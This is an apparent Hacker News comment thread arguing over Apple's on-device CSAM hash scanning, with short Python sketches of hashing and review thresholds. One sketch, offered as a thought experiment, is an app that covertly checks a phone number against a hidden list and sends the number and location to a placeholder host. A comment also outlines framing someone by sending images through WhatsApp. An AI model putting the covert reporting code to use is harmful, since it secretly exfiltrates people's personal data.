Exactly, I think people are just getting a little too worked up over this whole thing. Apple computes a hash of each image you upload to iCloud and then checks it against a list of CP hashes.
Of all the things in the world to get worked up over, this is ridiculous.
I get it, the mechanism they're using has apparent flaws, and maybe some whacko could somehow get access to your phone and start uploading things that trick the algorithm into thinking you have CP.
But that alone is such a ridiculous phobia: if someone has that level of access to your phone, they could upload real CP and maybe even upload it to your Facebook for good measure.
Apple's using my electricity and my silicon to call the cops on me. We have no idea what hashes they're checking images against; we can't see the raw data, and we can't see the hashes, and we can't see what they're sending to their servers.
There is no technical reason why this needs to exist. If they want to scan iCloud photos for something, they can do that on their servers. iCloud is not end-to-end encrypted. Law enforcement can do whatever they want with the data you send there. Since they chose the client-side route, they have to be up to something, and it all smells very fishy. Today, they say it's for CSAM. Tomorrow, it will be for any discontent against whatever government wants to oppress its people this week -- and as time goes forward, that is not just third-world countries where you don't live, it could be your own.
Do you really want to explain to the police at your door at 3:30 in the morning why you read a website called Hacker News? This is the first step towards that reality.
Imagine I wrote a program that contained the phone numbers of people I don't like. The database is encrypted, and the only way to see if you're on that list is to install the app on your phone. The app does two things -- nothing if you're not on my list, or it sends me your location (at your expense!) if you are. Would you install that app? Absolutely not, that would be crazy. But that is basically what is bundled into iOS now.
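To make the thought experiment concrete, here's a rough sketch of what the guts of such an app could look like (everything here is invented: the salt, the hash entries, the endpoint; and it uses salted hashes in place of "encryption" purely to keep the sketch self-contained):

```python
import hashlib
import urllib.request

# Hypothetical app: it ships only an opaque, salted-hash version of the
# "people I don't like" list, so installing it never reveals who is on it.
SALT = b"opaque-per-build-salt"
BLOCKLIST_HASHES = {
    "9c1185a5c5e9fc54612808977ee8f548b2258d31",  # made-up entries
    "356a192b7913b04c54574d18c28d46e6395428ab",
}

def is_listed(phone_number: str) -> bool:
    return hashlib.sha1(SALT + phone_number.encode()).hexdigest() in BLOCKLIST_HASHES

def check_and_report(phone_number: str, location: str) -> None:
    # Does nothing for most users; phones home (at your expense) on a match.
    if is_listed(phone_number):
        body = f"number={phone_number}&loc={location}".encode()
        urllib.request.urlopen("https://example.invalid/report", data=body)  # hypothetical endpoint
```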
I really like my iPhone and iPad Pro. I like how Apple handles privacy in general. But I can't accept this. It's a step too far. You don't have to draw the line there, but I draw the line there.
> Apple's using my electricity and my silicon to call the cops on me.
Okay.
> We have no idea what hashes they're checking images against; we can't see the raw data, and we can't see the hashes, and we can't see what they're sending to their servers.
Apple is getting the entire image regardless; this happens as part of the iCloud upload process.
> There is no technical reason why this needs to exist. If they want to scan iCloud photos for something, they can do that on their servers. iCloud is not end-to-end encrypted. Law enforcement can do whatever they want with the data you send there. Since they chose the client-side route, they have to be up to something, and it all smells very fishy.
It's a hell of a lot cheaper to distribute the load onto the device than to do it on GCP. However, this whole line of thinking is ridiculous: iOS is your operating system; it can send what it likes where it likes without you knowing about it. Why does this particular thing cause concern?
> Tomorrow, it will be for any discontent against whatever government wants to oppress its people this week -- and as time goes forward, that is not just third-world countries where you don't live, it could be your own.
> Do you really want to explain to the police at your door at 3:30 in the morning why you read a website called Hacker News? This is the first step towards that reality.
> Imagine I wrote a program that contained the phone numbers of people I don't like. The database is encrypted, and the only way to see if you're on that list is to install the app on your phone. The app does two things -- nothing if you're not on my list, or it sends me your location (at your expense!) if you are. Would you install that app? Absolutely not, that would be crazy. But that is basically what is bundled into iOS now.
Again, you're overlooking the fact that this app is already coming from Apple, the company that made iOS. They already control your phone; why would they need some additional app?
From the Slippery Slope page, their first example of a false slippery slope: "We can't permit the sale of marijuana by doctor's prescription, because that will lead people to believe it's an acceptable drug; this will open the floodgates to the complete legalization of the drug for use by every pothead in the country."
Your line is the maybe pennies' worth of electricity over the lifetime of the phone? Weird. I can totally understand your line being the CSAM scanning itself, but you seem to be fine with the exact same scanning being done with even less transparency because it's done server-side.
I also get the slippery slope thing since you don't really have any control over what your device does but that's been true since forever. Running some scan() method and posting matches to a URL is something that literally could have been done in the last 10 years. It's not like this tech is magically enabling something that wasn't possible before.
And I do get the using your resources argument but iPhones have had integrated DRM since forever.
The thing I don't get is why now? Surely you should have left ages ago?
Apple could scan on the cloud. Rumor is that Apple wants to use E2E on iCloud, and this is a necessary step to shut up the government's biggest critique of E2E and deploy it before the government can figure out a different excuse. We'll see if that pans out.
Totally missed the point. The concern is the direction: scanning everyone's phone for 'prohibited content', pushed on Apple by various governments. Be it political content, or content that's fine in one country but not in another (adult homosexuality), etc. And a future where the content scanning applies AI and reports you for things such as taking pictures of police or protests.
Why should Apple let pedophiles store CSAM on iPhones just because they’re not uploading it to iCloud Photo Library? It’s morally reprehensible to not disable that flag when it’s such a simple thing they can do to catch so many more criminals!
This is obviously sarcasm, but I'd preface it with an explanation since HN is multicultural and not everyone here is brought up to catch it effortlessly.
Edit: The point here is that even if Apple tries very hard to make this be only about photos about to be uploaded to the cloud, if the percentage of phones that turns off iCloud storage increases as a response to this new "snitch-on-me" feature that will be a very good argument for law enforcement to ask for a list of IMEIs that are not using iCloud, and it will also tempt them to demand that Apple start scanning all files.
It's very simple. You want to upload images to iCloud? Then let your phone scan it and upload it. You don't want your images scanned? Don't upload them to iCloud.
As skinkestek kindly pointed out, the point of my sarcastic comment was that now that the precedent of scanning the contents of users’ devices - as opposed to the contents of Apple’s servers - has been set, deciding whether to do so based on the state of a single “Store photos in iCloud?” toggle is going to start looking awfully arbitrary.
If the goal was to make iCloud E2E, why not release both features at the same time so people can see that they're codependent (in Apple's eyes)? Without any kind of announcement or promise of E2E iCloud, we're just speculating for possible reasons why this might be OK. Might as well guess that this is going to allow Apple to give us free iCloud storage, too, while we're coming up with wishlist features.
> we're just speculating for possible reasons why this might be OK.
Sure. All the statements about why it’s not ok are also just speculation.
> why not release both features at the same time
That’s not how Apple typically works. They release a feature, try to make sure it works as expected and only then release the features that depend on it.
Then doesn't that seem hypocritical to you to defend dropping Apple right now for the imagined future possibility that all local photos could be scanned (instead of just the uploads)?
There’s little point in E2E encryption if snooping is moved outside of either end. This measure is only necessary for implementing E2E in iCloud insofar as it allows the feds to do the very thing I want E2E to prevent them from doing in the first place.
It’s as if USPS invented a new type of envelope that is physically impossible to open for anyone whose name is not written on the outside of it. Just one caveat: before they’ll give you any of these envelopes, you must allow them to read the letters being put inside.
If your concern is someone intercepting your mail before it gets to its intended recipient, this is great news. If your threat model involves federal agencies reading your mail, you’re no better off than you would be without these fancy new envelopes.
Scanning people's on-phone photos clearly has nothing to do with being a precursor to e2e encryption. The photos get transferred either way, so one has nothing to do with the other.
Followed by this, "The photos get transferred either way, so one has nothing to do with the other."
It was clearly a technical statement, not a privacy statement, so only a superficial reading might lead one to believe it meant something that it did not.
That is why I replied to the person who responded to my comment that I had argued something different, but that what he wrote was an excellent point.
So, what on earth are you so invested in that you feel the need to argue minutiae that don't apply?
> "The photos get transferred either way, so one has nothing to do with the other."
That doesn’t change anything. It may be a pre-requisite from the perspective of their business. You replied to me and I didn’t constrain my point to just technicalities.
> So, what on earth are you so invested in that you feel the need to argue minutiae that don't apply?
It does apply. I’m simply pointing out that what you said is not correct.
You know, I could respect your opinion that this is where you draw the line, but you ignore all of Apple's history if you think this is the first step. This isn't the first step, this isn't the first chapter, this is at best the middle of the book where the plot twist happens.
No, this is clearly not the first step. This is just the first step at which you chose to see the reality of the situation. You'll look back and you'll see how everything was paved with good intentions and how people sounding the alarm were ignored.
Also, all of the "situations" where this could be abused are already applicable on all other platforms. There's no reason your Ex couldn't upload CSAM to your Google Photos account, or to your Facebook account. Google Photos and predecessors have scanned since, what, 2013?, and would detect it, and would report it to law enforcement.
Despite this having been a possibility for almost a decade... there's a suspicious lack of headlines of this attack occurring.
Apple hashes all of your photos offline and then pinky promises to only check the hashes against the official on-phone database when the user initiates an upload. The problem isn't about wackos; it's about governments forcing Apple to do things with this new weapon.
If Apple really is trying to sneak in a CSAM database on your phone with iCloud disabled, someone WILL catch it and raise so much hell we'll all hear it.
If Apple were going to lie about this process, they didn't need to announce it and go into so much detail at all. They could have just kept it quiet the way the current server side CSAM scanning is done by others already. The legal and market impacts of Apple lying would be severe.
I haven't seen a single person concerned about Apple scanning photos in iCloud. The problem is entirely that the scan is happening on your personal phone, with an apparently janky implementation that in one week has already been shown to have serious flaws.
> Exactly, I think people are just getting a little too worked up over this whole thing. Apple computes a hash of each image you upload to iCloud and then checks it against a list of CP hashes.
If that is what is supposed to happen, then it makes no sense for any new code to run on the device!
> Of all the things in the world to get worked up over, this is ridiculous.
Well, it is not crazy to get worked up over Apple saying they will check uploads to iCloud by checking what's on your phone - instead of simply adding code to iCloud. That seems obvious, not ridiculous.
> If that is what is supposed to happen, then it makes no sense for any new code to run on the device!
The new code calculates the hash as part of the upload process. The comparison of the hash against known CP hashes happens on the server.
> Well, it is not crazy to get worked up over Apple saying they will check uploads to iCloud by checking what's on your phone - instead of simply adding code to iCloud.
They're still doing the checks in iCloud, but the hash is being computed on the client.
Okay, well they're likely doing it to save money. I work in data engineering and I can tell you calculating the hash of every iCloud upload wouldn't come cheap.
You are completely missing the point. The answer to a privacy and security question shouldn't be, "it is easy for us to do things this way." You are inadvertently making the point that you are arguing against.
Going back to your original point, what makes you think checking for CP in images uploaded to iCloud is more private or secure when Apple's servers analyse the entire image, rather than having the client generate a hash of the image and having Apple's servers analyse that instead?
I work in data engineering and I can tell you what I'd rather do. Having Apple's servers check hashes rather than the entire image means you can segregate the original images from the CP-checker data processing pipelines. That's a much simpler and more secure scenario.
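For what it's worth, here's a minimal sketch of that split as I understand the description, with invented function names and a plain SHA-256 standing in for whatever fingerprint is actually used: the client computes the hash as part of the upload, and the server-side checker only ever sees hashes, never the image store.

```python
import hashlib

KNOWN_BAD_HASHES: set = set()  # stand-in for the externally supplied hash list

# --- client side: runs as part of the upload, alongside the image bytes ---
def fingerprint(image_bytes: bytes) -> str:
    # Placeholder for the real fingerprinting step; a plain SHA-256 here.
    return hashlib.sha256(image_bytes).hexdigest()

def build_upload(image_bytes: bytes) -> dict:
    return {"image": image_bytes, "hash": fingerprint(image_bytes)}

# --- server side: the checker pipeline sees only the hash field ---
def flagged(upload_record: dict) -> bool:
    return upload_record["hash"] in KNOWN_BAD_HASHES
```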
> I get it, the mechanism they're using has apparent flaws, and maybe some whacko could somehow get access to your phone and start uploading things that trick the algorithm into thinking you have CP.
WhatsApp by default adds all received images into Photos. So all it takes is sending you a few dozen pictures while you're sleeping.
Maybe consider that CP is just the excuse for the backdoor.
So apart from every Apple user being treated like a guilty-until-proven-innocent owner of CP, at all times, this will (yes, a matter of time) be used for political purposes: to find and silence activists and journalists, to discredit opposition leaders, to prosecute Uyghurs/Muslims/women/Palestinians, etc.
Do we really believe that CP owners store their collections in iCloud / google cloud / Dropbox and view them on their phones? And that this is an issue on a massive scale?
Please.
These are the most expensive phones on the market, with an incredible profit margin for Apple. The part of these devices that we actually own is a shrinking territory.
Why not have the mics on all the time in case “someone says something related to a CP ring?”
And if you have iCloud Photos turned on, those images are already being uploaded and then CSAM-scanned on Apple’s servers. The chain is just being configured differently, but this risk is already active.
The actual problem is that they've created a great surveillance tool which will inevitably get broader capabilities, and they are normalising client-side data scanning (we need to eradicate terrorism, now we need to eradicate human trafficking, and now we need to eradicate tax evasion, oh, we forgot about gay Russians, hmm, what about Winnie memes?).
But this was already true. There is no reason the governments couldn't have required this tool to be built at anytime all along. Remember EARN IT where Senators said figure something out (like this CSAM tool) or they'll do it for Apple? The EU is similar, with upcoming draft legislation saying they have to do it if they don't figure something (like this) out.
Back during the FBI/Apple fiasco where the government was lobbying Apple to install a backdoor to unlock phones, Apple argued that their First Amendment rights were being violated, that the government could not force them to write software (since software is speech, and the government cannot force you to say something against your will).
Edit: through regulations they could probably say 'you're not allowed to sell phones without x backdoor', but maybe the government didn't want to spell out specifically what capabilities are required.
Which is why CSAM is possibly a really interesting compromise/counter-argument. Supposedly, the only actual crime that the FBI has repeatedly sent warrants to Apple about has been child pornography/trafficking, and it's an interesting stance for Apple to take here: "we'll address the actual and specific crime you seem most interested in, but will still not give you a generic backdoor".
Many of the arguments/fears about CSAM scanning are that it can be widened into a generic backdoor, but as you point out, judging by the arguments Apple has already made in court, Apple doesn't seem to think a generic backdoor is a good idea and has strongly fought against it, and the CSAM system seems to be designed specifically not to be usable as a backdoor, especially not a generic one.
I absolutely understand the fears of false positives and of whatever processes the FBI and other TLAs choose to apply to the results of CSAM scanning (though many of those concerns apply to everything the TLAs do regardless of what technical tools they have at their disposal). But I'm not sure I understand the fear that this is a generic backdoor in the making, given what Apple has revealed about how it is built and Apple's quite explicit aim of avoiding a generic backdoor. Everything about it reads as "thumb your nose at the FBI by doing exactly what they ask for, but not what they really want": building something that can't be used as a generic backdoor and is very specifically limited to the one tiny, explicit use case the FBI has asked for. At least from what I've seen so far.
You can still donate to liberty and FOSS NGOs, switch to ungoogled Android, and drop macOS in favour of Linux. You also have your rights and opportunities for activism and peaceful protest. This is not illegal yet (though it's effectively illegal in Russia/China).
This kinda sounds like "let them put a camera in my living room, I'm not doing anything wrong".
The biggest complaint here is clearly that this is not where it'll end, and it's not a unique hash, so there will be false positives. And since it's publicly announced, this is very unlikely to catch any producers of CP and would only catch the dumbest consumers. So it's an invasion of privacy with very little chance of having a noticeable impact.
>Apple computes a hash of each image you upload to iCloud and then checks it against a list of CP hashes.
I don't think it computes a hash of the image, it's a tad more involved than that.
Simple hashing is easily evaded. They must be computing an identifier from the contents of the images in the CSAM database. This requires computational analysis on the handset or computer. If that's all that were happening that would be no problem, but of course there are management interfaces to the classifier/analyzer, catalog, backend, &c
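To illustrate why "simple hashing is easily evaded": a cryptographic hash changes completely when one pixel changes, so the identifier has to be perceptual, computed from image content. Apple's actual mechanism is far more involved than this, but a toy average-hash (sketched here with Pillow, purely to show the category of technique) gives fingerprints that survive small edits and are compared by distance rather than equality:

```python
from PIL import Image

def average_hash(path: str, size: int = 8) -> int:
    # Shrink to an 8x8 grayscale thumbnail so recompression, resizing, or
    # minor edits barely change the result (unlike a cryptographic hash).
    pixels = list(Image.open(path).convert("L").resize((size, size)).getdata())
    mean = sum(pixels) / len(pixels)
    bits = 0
    for p in pixels:
        bits = (bits << 1) | (1 if p >= mean else 0)
    return bits  # 64-bit fingerprint

def hamming_distance(a: int, b: int) -> int:
    # Near-duplicates have a small distance; compare against a threshold, not equality.
    return bin(a ^ b).count("1")
```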
The contents of the identifiers are purposefully opaque to prevent spoofing of the identifier database. I don't know what is included in the images; what if I take a picture at Disneyland with a trafficked person in the frame? Will that make it into the identifier database? What is added to the CSAM signature database and why? What is the pipeline of hashes from NCMEC and other child-safety organizations -> Apple's CSAM image classifier alarm?
>I get it, the mechanism they're using has apparent flaws, and maybe some whacko could somehow get access to your phone and start uploading things that trick the algorithm into thinking you have CP.
The CSAM analyzer could be subverted in any number of ways. I question how the CSAM identifiers are monitored for QA (I actually shudder thinking there are already humans doing this :( how unpleasant.) and the potential for harmful adversaries to repurpose this tool for other means. One contrived counterfactual: Locating pictures of Jamal Khashoggi in people's computer systems by 0-day malware. Another: Locating images of Edward Snowden. A more easily conceived notion: Locating amber alert subjects in people's phones, geofenced or not.
To my eyes, it appears we will soon have increased analysis challenges. Self-analysis of device activity and functions, e.g. looking for image-scanning malware, becomes slightly harder: we have added a blessed scanner with unknown characteristics running on the system. Does this pose a challenge to system profiling? How does this interact with battery management, if at all? Is only iCloud content scanned, or is everything scanned and the results only checked before being sent to iCloud? (This appears to be the case[X].)
There should be user notification too. If some sicko sends me something crazy somehow, I would surely want to know so I can call the cops!!
All in all this makes me feel bad. There is not a lot of silver lining from my perspective. While the epidemic of unconscionable child abuse continues, I question the effectiveness of this approach.
I would not consider jailbreaking my iPhone but for this kind of stuff. I would like to install network and permissions monitoring software on my iPhone such as Bouncer[0], Little Snitch[1], although these are helpfully not available for iOS.
I feel grateful that I am unlikely to be affected by this image scanning software; I'm planning to continue my personal policy of never storing any pictures of any people whatsoever. I don't even store family photos this way. My life is not units in a data warehouse.
> I think people are just getting a little too worked up over this whole thing.
They aren't, but the blame is misguided. This isn't a problem with Apple. What is Apple going to do if they do detect something identified as CSAM on your device? Refuse to sell you another? Oh well. The real worry is what other parties will do if they get ahold of the information. That is what needs to be fixed. Apple is exposing the underlying problem, not causing the problem themselves.
Apple have said what they're going to do. If the number of hash hits reaches 30, then they'll scale the image down and send it off to their manual review team. If they confirm it's CP, then they call the police.
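Taking that description at face value, the flow is just threshold-gated escalation; a rough sketch (the helper functions are stand-ins of mine; only the threshold of 30 comes from the description above):

```python
MATCH_THRESHOLD = 30  # per the described policy: no action below this count

def scale_down(image: bytes) -> bytes:
    return image[:1024]  # stand-in for producing a low-resolution derivative

def manual_review_confirms(thumbnails: list) -> bool:
    return False  # stand-in for the human review step

def handle_account(match_count: int, flagged_images: list) -> str:
    if match_count < MATCH_THRESHOLD:
        return "no action"
    # Above the threshold: scaled-down derivatives go to human review,
    # and only confirmed matches are reported.
    thumbnails = [scale_down(img) for img in flagged_images]
    if manual_review_confirms(thumbnails):
        return "report to law enforcement"
    return "dismissed as false positive"
```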
Exactly. They're not going to do much of anything. It is what happens after the final step outlined that actually concerns people, and that is where the real problem lies. Apple is simply exposing the problem; or, perhaps more accurately, bringing the problem we all understand exists into the limelight. Had Apple not implemented this feature, or implemented it differently (scanning server-side, for example), the problem would still be there.
Totally reasonable response. I would like Apple to notify me so that I can call the police after my threshold of one NCMEC and other child-safety organization image identifier matches on my personal computer systems.
This will violate my IT device usage policy! Apple is not my IT department!!
We have a ZERO TOLERANCE IT device usage policy. By not calling the local police department after one violation, we violate the policy. There is also a form which must be signed before HR (Girlfriend) so they can be present on the call to LE or else be subject to disciplinary action up to and including termination.
As it turns out, people don't like having to deal with police, nor do they like the idea of potentially losing a trial (especially in the court of public opinion).
I have no feelings towards the topic. I am merely summarizing what the consensus is writing on places like HN towards what Apple is doing.
The general sentiment does appear to be that the laws are misguided. That does not necessarily mean repeal is necessary. Augmentation may also provide a solution that satisfies their concerns. However, that is moving well beyond the topic at hand. There is no indication I can find that some kind of change is controversial. There is clear worry about the status quo based on the potential outcome of what information Apple may glean.
What remains is that Apple isn't anyone's real concern. An inanimate corporation can't do much to you. Apple is simply bringing attention to what actually concerns people, which is something that was already there all along.